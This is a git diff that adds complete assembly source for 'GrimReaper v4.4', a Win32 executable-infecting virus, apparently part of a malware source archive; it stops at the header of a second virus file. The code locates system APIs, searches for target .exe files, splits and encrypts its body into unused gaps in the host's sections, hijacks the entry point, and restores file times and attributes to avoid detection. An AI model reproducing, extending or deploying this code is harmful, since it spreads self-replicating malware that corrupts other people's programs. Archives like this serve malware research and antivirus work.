diff --git a/MSDOS/Virus.MSDOS.Unknown.GrimReaper_v4_4.asm b/MSDOS/Virus.MSDOS.Unknown.GrimReaper_v4_4.asm new file mode 100644 index 00000000..5e1a5d83 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.GrimReaper_v4_4.asm @@ -0,0 +1,1288 @@ +; The first F5G virus : "GrimReaper" +; Author: Ripper (Fuckup5Group) +; Website: fuckup5group.hypermart.net +; Begin: aprox. 12/18/00 +; Used assembler: TASM 5.0 +; +; Editor info: use a editor where one tab sign is equal to 3 spaces +; else it will be nearly unreadable +; +; Changes: +; v4.4 PRE-ALPHA (released 06/04/01): +; - documentation added (06/03/01) +; - the virus got a name ;) (06/03/01) +; - added 80h to the delta handle ebp to reduce virus size: +; the size shrunk by >>>169 BYTES<<< to 2461 bytes !!! +; that is under the 2474 bytes of v3.0 which didn't have virsections or +; encryption :D +; v4.3 PRE-ALPHA (released 05/18/01): +; - it's the first release with this header, so I'm unable to tell you any +; changes to prior releases +; - the virus has a size of 2630 bytes +; +; Virus size and bait size addition history: +; (with bait size addition I mean the growth of a bait file after infection. +; the first bait file is a minimal programm written in asm just calling +; MessageBoxA and ExitProcess so that there is a lot of unused space in it. +; the second bait file is the same written in cpp with as good as no unused +; space (even debug infos are included)) +; +; v?.?-1.3 unknown (no backups, overwritten) +; v1.4 = 2386 bytes + 5632 bytes + 6297 bytes (nothing! just infection) +; v1.5 = 2270 bytes + 5632 bytes + 6297 bytes +; +; v2.0-3 unknown (no backups, overwritten) +; v2.4 = 2577 bytes + 6144 bytes + 6809 bytes (no unused, but encrypt) +; (very interesting values! seems to be a big bug I didn't recognize that time) +; (oh, I've got it: I added the virus behind fileoffset + virtual size of the +; last section instead of fileoffset + raw size! so it's clear that it has to +; be a little bit bigger than it should be) +; +; v3.0 = 2474 bytes + 1536 bytes + 2713 bytes (no virsecs,no encrypt) +; v3.1 = 3095 bytes + 1536 bytes + 2713 bytes (no encryption) +; +; v4.0 = 3330 bytes + 1536 bytes + 2713 bytes +; v4.1 = 2916 bytes + 1024 bytes + 2201 bytes +; v4.2 = 2904 bytes + 1024 bytes + 1689 bytes (added 1 virsection) +; v4.3 = 2630 bytes + 512 bytes + 1689 bytes +; v4.4 = 2461 bytes + 512 bytes + 1689 bytes +; +; +; Todo: +; - I'm going to try to use the free space between the data directory and the +; first section. This should bring me to the long awaited + 0 bytes in the +; first bait size addition column if it doesn't take to much code... +; - still a payload is needed +; - perhaps something polymorphic but I don't think this will come into this +; virus +; - another infection check cause the "GR" in the MZ header is too easy too +; discover +; +; THIS IS A PRE-RELEASE VERSION!!!! USE AT OWN RISK!!! +; >YOU< ARE RESPONSIBLE FOR ANY DAMAGE CAUSED BY THIS PROGRAMM!!! +; +; When assembling, don't forget to make the codesegment writable +; (set the dword at offset 0000021C to C0000040) + +.386p +.model flat + +extrn ExitProcess:PROC +extrn GetModuleHandleA:PROC + +.data + db 0 + +.code + +start: + + ; get delta handle without making avps paying attention to it + + call GetDeltaHandle2 +GetDeltaHandle: + mov ecx,offset section1end-cryptstart + sub ebp,offset GetDeltaHandle-offset start-80h + cmp ebp,offset start+80h + je cryptstart ; first generation ? + + lea edi,[ebp+offset cryptstart-offset start-80h] ; no -> decrypt + mov eax,[ebp+offset randomkey-offset start-80h] + + call crypt + + jmp cryptstart + +GetDeltaHandle2: + mov ebp,esp ; pretend to be a normal function + lea esi,[ebp+4] + mov ebp,[esi-4] ; get offset of GetDeltaHandle + ret + +; crypt routine +; +; eax = Encryption key +; edi = ptr to data to be en- or decrypted +; ecx = size of data to be en- or decrypted +crypt: + rol eax,17 + sub ecx,4 + +crypt32loop: + xor dword ptr [edi],eax + add eax,001010101h + ror eax,3 + add edi,4 + sub ecx,4 + jns crypt32loop + add ecx,4 + je cryptdone + +crypt8loop: + xor byte ptr [edi],al + shr eax,8 + inc edi + dec ecx + jne crypt8loop + +cryptdone: + ret + +randomkey dd 0 + +cryptstart: ; here starts the encryption + jmp RealStart + +imagebase dd 0400000h +mapaddress dd 0 +filehandle dd 0 + +; information about the virus pieces in the file are stored here + +SECTIONNUM = 4 + +firstoffset dd 0 ;offset section1end +firstsize dd 0 ;(offset end-offset section1end) +firstdelta dd 0 + + dd 0 + dd 0 + dd 0 + + dd 0 + dd 0 + dd 0 + + dd 0 + dd 0 + dd 0 + + dd 0 + +; other stuff (sorted "by how often" it is used [excellent english,isn't it?]) + +oldip dd 0 +PEheader dd 0 +maxsize dd 0 +oldrawsize dd 0 +add2imagesize dd 0 +delta dd 0 +infectionflag dw 0 +unusedsize dd 0 +vxmemptr dd 0 + +kernel32 dd 0 +limit dd 0 +AddFunc dd 0 +AddName dd 0 +AddOrd dd 0 +Nindex dd 0 + +filealign dd 0 +fileofs dd 0 +fileattributes dd 0 + +ftcreation dq 0 ; file times +ftlastwrite dq 0 +ftlastaccess dq 0 + +newfilesize dd 0 +memory dd 0 + +maphandle dd 0 + +sectionalign dd 0 + +newip dd 0 + + +maxoffset dd 0 + +gmhptr dd 0 +gmh db "GetModuleHandleA",0 +gmhsize = $ - gmh +k32 db "KERNEL32.DLL",0 + +; The api functions + +FirstKERNELAPIName: +AExitProcess db "ExitProcess",0 +AGetProcAddress db "GetProcAddress",0 +ALoadLibrary db "LoadLibraryA",0 +AFreeLibrary db "FreeLibrary",0 +;AGetWindowsDirectory db "GetWindowsDirectoryA",0 +;AGetSystemDirectory db "GetSystemDirectoryA",0 +;AGetCurrentDirectory db "GetCurrentDirectoryA",0 +;ASetCurrentDirectory db "SetCurrentDirectoryA",0 +AFindFirstFile db "FindFirstFileA",0 +AFindNextFile db "FindNextFileA",0 +AGetFileAttributes db "GetFileAttributesA",0 +ASetFileAttributes db "SetFileAttributesA",0 +ACreateFile db "CreateFileA",0 +AGetFileTime db "GetFileTime",0 +;AGetFileSize db "GetFileSize",0 +ACreateFileMapping db "CreateFileMappingA",0 +AMapViewOfFile db "MapViewOfFile",0 +AUnmapViewOfFile db "UnmapViewOfFile",0 +ACloseHandle db "CloseHandle",0 +ASetFilePointer db "SetFilePointer",0 +ASetEndOfFile db "SetEndOfFile",0 +ASetFileTime db "SetFileTime",0 +AGlobalAlloc db "GlobalAlloc",0 +AGlobalFree db "GlobalFree",0 + + db 0 + +FirstUSER32APIName: +AMessageBox db "MessageBoxA",0 + db 0 + +FirstKERNELAPIAddress: +AExitProcessA dd 0 +AGetProcAddressA dd 0 +ALoadLibraryA dd 0 +AFreeLibraryA dd 0 +;AGetWindowsDirectoryA dd 0 +;AGetSystemDirectoryA dd 0 +;AGetCurrentDirectoryA dd 0 +;ASetCurrentDirectoryA dd 0 +AFindFirstFileA dd 0 +AFindNextFileA dd 0 +AGetFileAttributesA dd 0 +ASetFileAttributesA dd 0 +ACreateFileA dd 0 +AGetFileTimeA dd 0 +;AGetFileSizeA dd 0 +ACreateFileMappingA dd 0 +AMapViewOfFileA dd 0 +AUnmapViewOfFileA dd 0 +ACloseHandleA dd 0 +ASetFilePointerA dd 0 +ASetEndOfFileA dd 0 +ASetFileTimeA dd 0 +AGlobalAllocA dd 0 +AGlobalFreeA dd 0 + +FirstUSER32APIAddress: +AMessageBoxA dd 0 + +FirstLibName: +usr32 db "USER32.DLL",0 + +FirstLibAddress: +user32 dd ? + +infections dd 0 +exestr db "tester*.exe",0 ; the file filter + +; win32_find_data structure + +max_path = 260 + +filetime STRUC + FT_dwLowDateTime DD ? + FT_dwHighDateTime DD ? +filetime ENDS + +win32_find_data STRUC + FileAttributes DD ? + CreationTime filetime ? + LastAccessTime filetime ? + LastWriteTime filetime ? + FileSizeHigh DD ? + FileSizeLow DD ? + Reserved0 DD ? + Reserved1 DD ? + FileName DB max_path DUP (?) + AlternateFileName DB 13 DUP (?) + DB 3 DUP (?) +win32_find_data ENDS + +searchptr dd 0 ; pointer to the search struct + +viruslen = end-start + +;MsgTitle db "You are getting infected!",0 +;MsgText db "This is MY message box!",0 + +RealStart: + ; + ; Check my surroundings + ; + mov esi,[ebp+offset imagebase-offset start-80h] + cmp word ptr [esi],'ZM' ; is "MZ"? + jne getouttahere + add esi,03ch ; pointer to new header addr + mov esi,[esi] ; get new header address + add esi,[ebp+offset imagebase-offset start-80h] ; align it + cmp word ptr [esi],'EP' ; is "PE"? + jne getouttahere + + cmp ebp,offset start+80h + jne notfirstgen + ; tasm gives an error when writen so : +; lea eax,[ebp+offset GetModuleHandleA-offset start-80h] + lea eax,[ebp+offset GetModuleHandleA-00401000h-80h] + jmp callit + +notfirstgen: + mov eax,[ebp+offset gmhptr-offset start-80h];get address of GetModuleHandle + mov eax,[eax] + or eax,eax + je getouttahere ; is NULL ? -> fuck you! + +callit: + lea edx,[ebp+offset k32-offset start-80h] ; get module handle of KERNEL32 + push edx + call eax + or eax,eax + jne found + + mov eax,0bff70000h ; couldn't get it? -> hardcode address + +found: + mov [ebp+offset kernel32-offset start-80h],eax ; check if it's really a PE + mov edi,eax + cmp word ptr [edi],'ZM' + jne getouttahere + mov edi,[edi+03ch] + add edi,eax + cmp word ptr [edi],'EP' + jne getouttahere + + pushad ; ok it "should be" KERNEL32 + mov edx,eax ; ptr to kernel32 + mov esi,[edi+078h] ; get ptr to export directory + lea edi,[ebp+offset limit-offset start-80h] + lea esi,[esi+edx+18h] ; point to num. of names + movsd ; get it + lodsd ; + add eax,edx ; + stosd ; get ptr to funcofslist:AddFunc + lodsd + add eax,edx + stosd ; get ptr to nameofslist:AddName + lodsd + add eax,edx + stosd ; get ptr to nameordlist:AddOrd + mov eax,[ebp+offset AddName-offset start-80h]; get first pointer to a name + stosd ; save it into Nindex + + ; search for GetProcAddress so that the other api functions + ; can be found with that function + + mov edi,[eax] + add edi,edx + xor ecx,ecx + lea ebx,[ebp+offset AGetProcAddress-offset start-80h] + + ; find name in name list + +tryagain: + mov esi,ebx + +matchbyte: + cmpsb + jne nextone + + cmp byte ptr [edi],0 + je gotit + jmp matchbyte + +nextone: + inc ecx + cmp ecx,dword ptr [ebp+offset limit-offset start-80h] + jge getouttahere + + add dword ptr [ebp+offset Nindex-offset start-80h],4 ; get next pointer rva + mov esi,[ebp+offset Nindex-offset start-80h] + mov edi,[esi] + add edi,edx + jmp tryagain + + ; name found -> get function entry point + +gotit: + lea ebx,[esi+1] + add ecx,ecx + mov esi,[ebp+offset AddOrd-offset start-80h] + add esi,ecx + xor eax,eax + mov ax,word ptr [esi] + shl eax,2 + mov esi,[ebp+offset AddFunc-offset start-80h] + add esi,eax + mov edi,dword ptr [esi] + add edi,edx + mov [ebp+offset AGetProcAddressA-offset start-80h],edi + popad + + ; get other KERNEL32 api functions' addresses + + lea edi,[ebp+offset FirstKERNELAPIName-offset start-80h] + lea esi,[ebp+offset FirstKERNELAPIAddress-offset start-80h] + mov ebx,[ebp+offset kernel32-offset start-80h] + call GetAPIFuncs + or eax,eax + jne getouttahere + + ; use LoadLibrary to load USER32 for the MessageBox funcion + + lea eax,[ebp+offset usr32-offset start-80h] + push eax + mov eax,[ebp+offset ALoadLibraryA-offset start-80h] + call eax + or eax,eax + je getouttahere + mov [ebp+offset user32-offset start-80h],eax + + ; get needed USER32 api functions + + lea edi,[ebp+offset FirstUSER32APIName-offset start-80h] + lea esi,[ebp+offset FirstUSER32APIAddress-offset start-80h] + mov ebx,[ebp+offset user32-offset start-80h] + call GetAPIFuncs + or eax,eax + jne getouttahere2 + + ; this "payload" was commented out to reduce needed diskspace ;) + ; it will be changed soon (like making it dependent on the number of + ; infections being made yet on this computer or something like this...) + +; push 0 +; lea ecx,[ebp+offset MsgTitle-offset start-80h] +; push ecx +; lea ecx,[ebp+offset MsgText-offset start-80h] +; push ecx +; push 0 +; mov eax,[ebp+offset AMessageBoxA-offset start-80h] +; call eax + + cmp ebp,offset start+80h + je nosecinit ; first generation ? + + ; no -> put virus pieces together again + + call InitOtherVxSecs + + ; infect directories + + mov eax,[ebp+offset vxmemptr-offset start-80h] + add eax,offset Infect_directories-offset start + + call eax + + ; and free up the memory space needed by the pieces + + push dword ptr [ebp+offset vxmemptr-offset start-80h] + mov eax,[ebp+offset AGlobalFreeA-offset start-80h] + call eax + + jmp getouttahere2 + +nosecinit: ; yes -> no sections -> just call it + call Infect_directories + +getouttahere2: + push dword ptr [ebp+offset user32-offset start-80h] + mov eax,[ebp+offset AFreeLibraryA-offset start-80h] + call eax + +getouttahere: + cmp ebp,offset start+80h + je exitnow ; first generation ? + mov eax,[ebp+offset oldip-offset start-80h] ; no -> call old entry point + add eax,[ebp+offset imagebase-offset start-80h] + jmp eax + +exitnow: ; yes -> exit programm + push 0 + mov eax,[ebp+offset AExitProcessA-offset start-80h] + call eax + +; api function address "getter" +; +; ebx = library handle +; edi = address of first API name +; esi = address of first receiving API address +GetAPIFuncs: + push ecx + push edx +nextAPIFunc: + push edi + push ebx + mov eax,[ebp+offset AGetProcAddressA-offset start-80h] + call eax + or eax,eax + je GAFerror + mov [esi],eax + add esi,4 + xor eax,eax + mov ecx,128 + repnz scasb ; go to next name + cmp byte ptr [edi],0 ; was it the last one? + jne nextAPIFunc + + pop edx + pop ecx + ret + +GAFerror: + inc eax + pop edx + pop ecx + ret + +; function to put the pieces of the virus distributed all over in the executable +; into one piece, so that it can be executed + +InitOtherVxSecs: + + ; allocate memory where the pieces can be put together + + push viruslen + push 0 + mov eax,[ebp+offset AGlobalAllocA-offset start-80h] + call eax + or eax,eax ; Could I allocate needed memory? + je getouttahere2 ; No -> rrrrrrrrausssssss + + mov [ebp+offset vxmemptr-offset start-80h],eax + + ; copy first section into that space + + mov edi,eax + lea esi,[ebp+offset start-offset start-80h] + mov ecx,offset section1end-offset start + rep movsb + + ; go through section list, copy the pieces into the memory space + ; and decrypt it + + lea edx,[ebp+offset firstoffset-offset start-80h] + xor eax,eax +nextsec: + mov esi,[edx] ; address of section + or esi,esi + je allsecscopied + mov ecx,[edx+4] ; length of section + rep movsb ; copy it + + mov ecx,[edx+4] + sub edi,ecx + mov eax,[ebp+offset randomkey-offset start-80h] + call crypt ; decrypt it + +; mov ebx,edi +; mov edi,[edx] +; mov ecx,[edx+4] +; rep stosb ; clear used file sections +; mov edi,ebx ; doesn't work: some are write protected! +; add edx,8 + + add edx,12 ; go to next section + jmp nextsec + +allsecscopied: + ret ; done + +section1end: + +; here ends the first section which is ALWAYS in one piece appended +; to the last filesection. the following code will be put depending of the +; victim into totally different pieces. so this will be fully executed in +; the allocated memory except in case it's the first generation... + +Infect_directories: + push ebp + call GetDeltaHandle2 ; get new delta handle +GetDeltaHandle3: + sub ebp,offset GetDeltaHandle3-offset start-80h + + ; allocate memory for the search structure + + push 320 + push 0 + mov eax,[ebp+offset AGlobalAllocA-offset start-80h] + call eax + or eax,eax + je memerror + mov [ebp+offset searchptr-offset start-80h],eax + + ; infect ONE file in the current directory + + mov dword ptr [ebp+offset infections-offset start-80h],1 + call infect_current_dir + + ; free search struct memory + + push dword ptr [ebp+offset searchptr-offset start-80h] + mov eax,[ebp+offset AGlobalFreeA-offset start-80h] + call eax + +memerror: + pop ebp + ret + +; search for file with filter in current directory +; and infect it + +infect_current_dir: + mov edi,[ebp+offset searchptr-offset start-80h] + push edi + lea eax,[ebp+offset exestr-offset start-80h] + push eax + mov eax,[ebp+offset AFindFirstFileA-offset start-80h] + call eax + inc eax + jz no_files + dec eax + push eax + +TryInfection: + lea esi,[edi.FileName] + mov ecx,[edi.FileSizeLow] + call Infect_File ; GO GO GO!!! + jc Another_file + dec dword ptr [ebp+offset infections-offset start-80h] + je All_done + +Another_file: + push edi ; delete old filename + lea edi,[edi.FileName] + mov ecx,13 + xor al,al + rep stosb + pop edi + pop eax + push eax + push edi + push eax + mov eax,[ebp+offset AFindNextFileA-offset start-80h] ; get next filename + call eax + or eax,eax + jne TryInfection + +All_done: + pop eax +no_files: + ret + +; this is the main infection routine + +Infect_File: + pushad + + mov dword ptr [ebp+newfilesize-offset start-80h],ecx + mov word ptr [ebp+infectionflag-offset start-80h],0 + add ecx,viruslen+1000h ; some extra work space + mov [ebp+offset memory-offset start-80h],ecx + + ; backup fileattributes and set them to normal because of possible write + ; protection etc. + + mov [ebp+offset fileofs-offset start-80h],esi ; pointer to filename + push esi + mov eax,[ebp+AGetFileAttributesA-offset start-80h] + call eax + or eax,eax + mov [ebp+fileattributes-offset start-80h],eax ; backup attributes + + push 80h + push esi + mov eax,[ebp+offset ASetFileAttributesA-offset start-80h] + call eax + + ; open the victim + + push 0 ; file template + push 0 ; file attributes + push 3 ; open existing file + push 0 ; security option = default + push 1 ; file share for read + push 0c0000000h ; general write and read + push esi ; filename + mov eax,[ebp+offset ACreateFileA-offset start-80h] + call eax + + mov [ebp+offset filehandle-offset start-80h],eax + cmp eax,-1 + je infection_error + + ; save old filetimes + + lea ebx,[ebp+offset ftcreation-offset start-80h] + push ebx + add ebx,8 + push ebx + add ebx,8 + push ebx + push eax + mov ebx,[ebp+AGetFileTimeA-offset start-80h] + call ebx + + ; create a mapping of the file + + push 0 ; filename handle=NULL + push dword ptr [ebp+offset memory-offset start-80h] ; max size + push 0 ; min size + push 4 ; page read & write + push 0 ; security attrs + push dword ptr [ebp+offset filehandle-offset start-80h] + mov eax,[ebp+offset ACreateFileMappingA-offset start-80h] + call eax + + mov [ebp+offset maphandle-offset start-80h],eax + or eax,eax + je close_file + + ; map a view of the file into memory + + push dword ptr [ebp+offset memory-offset start-80h]; bytes to map + push 0 ; low file offset + push 0 ; hight file offset + push 2 ; file map read/write mode + push eax ; file map handle + mov eax,[ebp+offset AMapViewOfFileA-offset start-80h] + call eax + + or eax,eax + je close_map + mov esi,eax + mov [ebp+offset mapaddress-offset start-80h],esi + + ; check if it's a PE and if it's already infected + + cmp word ptr [esi],'ZM' + jne Unmap_view + cmp word ptr [esi+38h],'RG' ; very cheap + jne ok_go + dec word ptr [ebp+infectionflag-offset start-80h] + jmp Unmap_view + +ok_go: + mov ebx,dword ptr [esi+03ch] + add esi,ebx ; esi points now to pehead + cmp word ptr [esi],'EP' + jne Unmap_view + + lea edi,[ebp+offset firstoffset-offset start-80h] ; reset virsection data + mov ecx,10 + xor eax,eax + rep stosd + mov dword ptr [ebp+offset firstoffset-offset start-80h+12*(SECTIONNUM-1)],1 + + mov [ebp+offset PEheader-offset start-80h],esi + mov eax,[esi+28h] + push dword ptr [ebp+offset oldip-offset start-80h] ; save own oldip + mov [ebp+offset oldip-offset start-80h],eax + + push dword ptr [ebp+offset imagebase-offset start-80h] ; save own imagebase + mov eax,[esi+34h] + mov [ebp+offset imagebase-offset start-80h],eax + + mov eax,[esi+38h] + mov [ebp+offset sectionalign-offset start-80h],eax + + mov eax,[esi+3ch] + mov [ebp+offset filealign-offset start-80h],eax + + xor ecx,ecx + mov dword ptr [ebp+offset add2imagesize-offset start-80h],ecx + + ; + ; Check import dir for GetModuleHandle + ; + + mov edx,[esi+84h] ; imp dir size + mov edi,[esi+80h] ; imp dir addr + + ; search for import directory in the victim file + + mov cx,[esi+6] ; num of secs + mov eax,[esi+74h] ; num of dir entries + shl eax,3 + add esi,78h + add esi,eax + + ; search for a section where is + ; virtualaddr<=impdiraddr && virtualaddr+size>=impdiraddr+impdirsize + +nextsecchk: + mov eax,[esi+0ch] ; virtual address + cmp eax,edi + jbe firstcondok +notok: + add esi,28h + dec ecx + je didntfoundit + jmp nextsecchk +firstcondok: + add eax,[esi+10h] ; size of raw data + cmp eax,edi + jna notok + + ; calculate fileoffset of import directory + + mov ecx,[ebp+offset mapaddress-offset start-80h] + add ecx,[esi+14h] + sub ecx,[esi+0ch] + add edi,ecx + + mov esi,edi ; ptr to begin of imp dir + mov ebx,edx ; backup imp dir size + add edx,esi ; ptr to end of imp dir + + ; search for KERNEL32 imports + +nextimpdirentry: + mov eax,[esi+0ch] + add eax,ecx + cmp dword ptr [eax],'NREK' + je foundit + add esi,014h + cmp esi,edx + jl nextimpdirentry + jmp didntfoundit + +foundit: + mov esi,[esi+10h] ; use RVAFuncionAddressList instead of NameList + or esi,esi + je didntfoundit + + add esi,ecx + mov edx,esi + mov eax,ebx + + ; search for the GetModuleFunction function + +lookloop: + cmp dword ptr [edx],0 + je didntfoundit + cmp byte ptr [edx+3],80h + je nothere + mov esi,[edx] + push ecx + add esi,ecx + add esi,2 + lea edi,[ebp+offset gmh-offset start-80h] + mov ecx,gmhsize + rep cmpsb + pop ecx + je foundgmh + +nothere: + add edx,4 + dec eax + jne lookloop + +didntfoundit: ; not found -> infection impossible + pop dword ptr [ebp+offset imagebase-offset start-80h] + pop dword ptr [ebp+offset oldip-offset start-80h] + jmp Unmap_view + +foundgmh: + + ; store its address in gmhptr + + add edx,[ebp+offset imagebase-offset start-80h] + sub edx,ecx + mov [ebp+offset gmhptr-offset start-80h],edx + + mov esi,[ebp+offset PEheader-offset start-80h] + + ; + ; calculate how the virus should be put into the victim + ; + + ; calculate file offset of last section + + mov ebx,[esi+74h] ; num of dir entries(each 8 byte) + shl ebx,3 + xor eax,eax + mov ax,word ptr [esi+6h] ; num of sections(each 28 byte) + dec eax + mov ecx,28h + mul ecx + add esi,78h ; dir table offset + add esi,ebx + add esi,eax ; esi is now pointing at last sections offset + + or dword ptr [esi+24h],0a0000020h ; set sec flags for code,exec,write + mov ecx,[esi+10h] ; raw data size + mov [ebp+offset oldrawsize-offset start-80h],ecx + + ; count number of unused bytes(00 bytes) in the last section + + mov edi,[esi+14h] ; raw data fileoffset + add edi,[ebp+offset mapaddress-offset start-80h] + add edi,ecx + dec edi ; edi -> last byte of last section + std + xor eax,eax + repz scasb + cld + mov eax,[ebp+offset oldrawsize-offset start-80h] + dec eax + sub eax,ecx + mov [ebp+offset unusedsize-offset start-80h],eax + + mov ebx,viruslen + cmp eax,ebx ; is enough room in unused raw data ? + jae vxinraw + + sub ebx,eax ; no, calc rest needed + + cmp eax,offset section1end-offset start + jae sec1inraw ; is enough room for sec1 in unused raw data ? + + neg eax ; no, add rest of sec1 to last sec (only size) + add eax,offset section1end-offset start + add [esi+10h],eax + sub ebx,eax ; ebx is the rest needed + +sec1inraw: + + ; search for unused space in all file sections and store infos about 'em + + lea edx,[ebp+offset firstoffset-offset start-80h] + +whatsyouwantloop: + call GetBiggestUnusedSpace + + mov [edx],edi + mov [edx+4],ecx + mov [edx+8],eax + + cmp ebx,ecx + ja ineedmore + + mov [edx+4],ebx ; set last size to ebx + jmp imsatisfied + +ineedmore: + sub ebx,ecx + + add edi,ecx + add edx,12 + mov byte ptr [edi-1],1 ; mark as used + cmp dword ptr [edx],1 + jne whatsyouwantloop + +ineedmore2: + + ; the remaining rest will be added to the last section after the first + ; virus section + + mov edi,[esi+14h] ; fileoffset + add edi,[ebp+offset mapaddress-offset start-80h] + add edi,[esi+10h] ; raw size + mov [edx],edi ; virsec offset + + mov [edx+4],ebx ; virsec size = rest + + ; calculate delta value between virsec offset in virmem(mapaddress) and + ; the one in executed memory(imagebase) + + mov eax,[esi+0ch] ; virtual addr + sub eax,[esi+14h] ; fileoffset + sub eax,[ebp+offset mapaddress-offset start-80h] + add eax,[ebp+offset imagebase-offset start-80h] + mov [edx+8],eax ; virsec delta + + add [esi+10h],ebx ; add rest to raw size + mov eax,[esi+10h] + +imsatisfied: + + ; align raw data size to filealign + + xor edx,edx + mov ecx,[ebp+offset filealign-offset start-80h] + div ecx + sub ecx,edx + add [esi+10h],ecx + mov eax,[esi+10h] + + cmp eax,[esi+8h] ; raw data bigger than virtual size ? + jbe rawinvirtual + + mov [esi+8h],eax ; yes -> set it to raw size + +; Align virtual size to sectionalign + + mov ecx,[ebp+offset sectionalign-offset start-80h] + div ecx + sub ecx,edx + add [esi+8h],ecx + mov [ebp+offset add2imagesize-offset start-80h],ecx + +vxinraw: +rawinvirtual: + + ; calculate the new entry point for the victim + + mov eax,[esi+0ch] ; virtual address + add eax,[ebp+offset oldrawsize-offset start-80h] + sub eax,[ebp+offset unusedsize-offset start-80h] ; sub unused raw data size + mov [ebp+offset newip-offset start-80h],eax + + ; calculate the new size of the file + + mov eax,[esi+14h] ; file offset of rawdata + add eax,[esi+10h] ; add new raw data size + mov [ebp+offset newfilesize-offset start-80h],eax + + ; calculate random key + + call random32 + push dword ptr [ebp+offset randomkey-offset start-80h] ; save own random key + mov dword ptr [ebp+offset randomkey-offset start-80h],eax + + ; + ; copy the virus into the victim + ; + + ; copy section 2 into calced pieces + + push esi + + lea esi,[ebp+offset section1end-offset start-80h] + lea edx,[ebp+offset firstoffset-offset start-80h] + +copynextpcs: + mov edi,[edx] ; virsec offset + or edi,edi + je notapiece + mov ecx,[edx+4] ; virsec size + rep movsb ; copy it + + mov edi,[edx] + mov ecx,[edx+4] + mov eax,[ebp+offset randomkey-offset start-80h] + call crypt ; encrypt it + + mov eax,[edx+8] ; virsec delta + add [edx],eax ; change offset + add edx,12 ; go to next virsec + jmp copynextpcs + +notapiece: + pop esi + + ; calculate virus destination address + +; mov edi,[esi+14h] ; file offset of rawdata +; add edi,[ebp+offset oldrawsize-offset start-80h] +; sub edi,[ebp+offset unusedsize-offset start-80h] +; add edi,[ebp+offset mapaddress-offset start-80h] + + mov edi,[ebp+offset newip-offset start-80h] + sub edi,[esi+0ch] ; virtual address + add edi,[esi+14h] ; file offset of rawdata + add edi,[ebp+offset mapaddress-offset start-80h] + + ; copy first virus section + + lea esi,[ebp+offset start-offset start-80h] + push edi + mov ecx,offset section1end-offset start + rep movsb + + pop edi + mov eax,[ebp+offset randomkey-offset start-80h] + add edi,offset cryptstart-offset start + + pop dword ptr [ebp+offset randomkey-offset start-80h] ; restore stuff + pop dword ptr [ebp+offset imagebase-offset start-80h] + pop dword ptr [ebp+offset oldip-offset start-80h] + + mov ecx,offset section1end-offset cryptstart + call crypt ; encrypt it + + ; write new eip to PE header + + mov esi,[ebp+offset PEheader-offset start-80h] + mov eax,[ebp+offset newip-offset start-80h] + mov [esi+28h],eax + + ; increase size of image + + mov eax,[ebp+offset add2imagesize-offset start-80h] + add [esi+50h],eax + + ; mark as infected + + mov esi,[ebp+offset mapaddress-offset start-80h] + mov word ptr [esi+38h],'RG' + + ; + ; end the infection + ; + +Unmap_view: + push dword ptr [ebp+offset mapaddress-offset start-80h] + mov eax,[ebp+AUnmapViewOfFileA-offset start-80h] + call eax + +close_map: + push dword ptr [ebp+offset maphandle-offset start-80h] + mov eax,[ebp+ACloseHandleA-offset start-80h] + call eax + +close_file: + + ; set file pointer to end of file + + push 0 + push 0 + push dword ptr [ebp+offset newfilesize-offset start-80h] + push dword ptr [ebp+offset filehandle-offset start-80h] + mov eax,[ebp+offset ASetFilePointerA-offset start-80h] + call eax + + ; mark end of file + + push dword ptr [ebp+offset filehandle-offset start-80h] + mov eax,[ebp+offset ASetEndOfFileA-offset start-80h] + call eax + + ; restore file times + + lea ebx,[ebp+offset ftcreation-offset start-80h] + push ebx + add ebx,8 + push ebx + add ebx,8 + push ebx + push dword ptr [ebp+offset filehandle-offset start-80h] + mov ebx,[ebp+ASetFileTimeA-offset start-80h] + call ebx + + ; close the file + + push dword ptr [ebp+offset filehandle-offset start-80h] + mov eax,[ebp+ACloseHandleA-offset start-80h] + call eax + + ; restore old file attributes + + push dword ptr [ebp+offset fileattributes-offset start-80h] + push dword ptr [ebp+offset fileofs-offset start-80h] + mov eax,[ebp+offset ASetFileAttributesA-offset start-80h] + call eax + + cmp word ptr [ebp+offset infectionflag-offset start-80h],0ffffh + je infection_error + clc + popad + ret + +infection_error: + stc + popad + ret + +; searches all section for unused space at the end of each and returns +; the biggest space found + +GetBiggestUnusedSpace: + pushad + + xor ecx,ecx + mov dword ptr [ebp+offset maxoffset-offset start-80h],ecx + mov dword ptr [ebp+offset maxsize-offset start-80h],ecx + mov dword ptr [ebp+offset delta-offset start-80h],ecx + + ; calculate offset to the first section header + + mov esi,[ebp+offset PEheader-offset start-80h] + mov ebx,[esi+74h] ; num of dir entries(each 8 byte) + shl ebx,3 + mov cx,word ptr [esi+6h] ; num of sections(each 28h byte) + dec ecx ; don't search in last section + add esi,78h ; dir table offset + add esi,ebx + + ; check each section + +trynextsec: + push ecx + mov ecx,[esi+10h] + mov edi,[esi+14h] + add edi,[ebp+offset mapaddress-offset start-80h] + add edi,ecx + dec edi + std + xor eax,eax + repz scasb + mov eax,[esi+10h] + cld + sub eax,ecx + dec eax + pop ecx + + cmp eax,[ebp+offset maxsize-offset start-80h] + jna notmax + + sub eax,4 ; don't use last 4 bytes to avoid messing + js notmax ; with things like jmp [00412340] + mov [ebp+offset maxsize-offset start-80h],eax + add edi,2+4 + mov [ebp+offset maxoffset-offset start-80h],edi + + ; calculate delta value + + mov eax,[esi+0ch] + sub eax,[esi+14h] + sub eax,[ebp+offset mapaddress-offset start-80h] + add eax,[ebp+offset imagebase-offset start-80h] + mov [ebp+offset delta-offset start-80h],eax + +notmax: + add esi,28h + dec ecx + jne trynextsec + popad + mov ecx,[ebp+offset maxsize-offset start-80h] + mov edi,[ebp+offset maxoffset-offset start-80h] + mov eax,[ebp+offset delta-offset start-80h] + ret + +; get a 32bit pseudo-random value +random32: + call random16 + shl eax,16 + call random16 + ret + +; play with timer registers to get a 16bit pseudo-random value +random16: + push ebx + xor bx,0ce76h +seed equ word ptr $-2 + in al,41h + add bl,al + in al,42h + add bh,al + xor ah,al + in al,42h + xor bx,ax + xor al,ah + sub bl,al + in al,40h + sub bh,ah + in al,41h + mov ah,al + in al,42h + neg ax + xor ebx,eax + ror bx,3 + mov word ptr [ebp+offset seed-offset start-80h],bx + mov ax,bx + pop ebx + ret + +end: +end start +end \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.flue.asm b/MSDOS/Virus.MSDOS.Unknown.flue.asm new file mode 100644 index 00000000..28399194 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.flue.asm @@ 